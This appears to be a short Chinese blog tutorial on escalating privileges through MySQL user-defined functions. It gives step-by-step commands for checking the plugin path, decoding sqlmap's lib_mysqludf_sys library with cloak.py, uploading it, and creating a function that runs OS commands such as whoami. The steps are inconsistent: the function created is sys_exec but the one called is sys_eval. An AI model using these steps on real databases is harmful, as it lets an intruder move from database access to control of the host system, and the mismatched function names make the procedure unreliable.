0x00介绍

MySQL UDF(用户定义函数)是一种在MySQL数据库中执行自定义C/C++代码的方式。UDF可以用于执行特定的操作或者提权。

当获得数据库控制权时权限不足就可以使用UDF提权。

0x01手动提权

Windows

1.上传lib_mysqludf_sys文件,创建udf函数。

查看plugin路径

show variables like '%plugin%';

获取操作系统信息

select @@version_compile_os, @@version_compile_machine;

进入/sqlmap/extra/cloak/

python cloak.py -d -i D:/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_

解密后将文件上传到 mysql/lib/plugin/ 路径下(Windows默认不会创建,需要自己创建)

create function sys_exec returns string soname "lib_mysqludf_sys.dll";


select sys_eval('whoami');

Linux

Linux的操作都差不多区别在于lib_mysqludf_sys的为后缀为 .so

最后修改:2023 年 10 月 31 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏